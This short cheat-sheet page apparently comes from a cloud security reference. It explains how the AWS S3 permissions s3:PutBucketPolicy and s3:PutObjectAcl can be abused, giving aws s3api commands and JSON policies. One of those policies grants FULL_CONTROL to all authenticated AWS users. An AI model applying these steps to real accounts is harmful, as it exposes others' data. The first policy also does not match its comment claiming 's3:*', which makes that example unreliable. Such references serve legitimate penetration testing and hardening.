S3 - PrivEsc

Abusable AWS S3 permissions that can lead to compromise or privilege escalation

s3:PutBucketPolicy

With access to this permission, an attacker could give themselves permissions over the bucket and its contents.

aws s3api put-bucket-policy --bucket <bucketName> --policy file://new-bucket-policy.json
# new-bucket-policy.json, adding s3:*

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::1234567890:root"
            },
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::bucket-name"
        },
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::1234567890:user/<userName>"
            },
            "Action": [
                "s3:GetObject"
            ],
            "Resource": "arn:aws:s3:::bucket-name/*"
        }
    ]
}

s3:PutObjectAcl

With access to this permission, an attacker could give themselves permissions over the bucket and its contents.

aws s3api put-object-acl --bucket <bucketName> --key <objectKey> --access-control-policy file://object-acl-policy.json
# object-acl-policy.json, adding the Grantee:Group

{
    "Owner": {
        "DisplayName": "bucket-owner",
        "ID": "lsjdflsdflnwelknwlefnl23423423423lk234"
    },
    "Grants": [
        {
            "Grantee": {
                "DisplayName": "bucket-owner",
                "ID": "lsjdflsdflnwelknwlefnl23423423423lk234",
                "Type": "CanonicalUser"
            },
            "Permission": "FULL_CONTROL"
        },
        {
            "Grantee": {
                "Type": "Group",
                "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
            },
            "Permission": "FULL_CONTROL"
        }
    ]
}

Last updated